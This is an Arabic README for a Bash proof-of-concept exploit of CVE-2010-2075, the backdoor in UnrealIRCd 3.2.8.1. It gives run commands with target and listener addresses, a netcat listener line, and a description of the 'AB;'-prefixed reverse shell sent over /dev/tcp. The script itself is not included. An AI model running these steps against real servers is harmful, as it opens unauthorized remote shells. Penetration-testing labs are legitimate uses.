
استغلال CVE-2010-2075
إثبات المفهوم Bash للباب الخلفي الذي تم إدخاله في حزمة المصدر لـ UnrealIRCd 3.2.8.1. ينفذ الثنائي المخترق أوامر عشوائية مسبوقة بـ AB; مرسلة إلى منفذ IRC.
chmod +x exploit.sh
./exploit.sh <RHOST> <RPORT> <LHOST> <LPORT>
مثال:
./exploit.sh 192.168.1.10 6667 192.168.1.20 4444
قم بإعداد مستمع قبل التشغيل:
nc -lvnp 4444
يتحقق الباب الخلفي من البيانات الواردة للبادئة AB; ويمرر الباقي
إلى شل النظام. يرسل الحمولة شل عكسي Bash عبر /dev/tcp.
للاستخدام التعليمي والاختبار المصرح به فقط.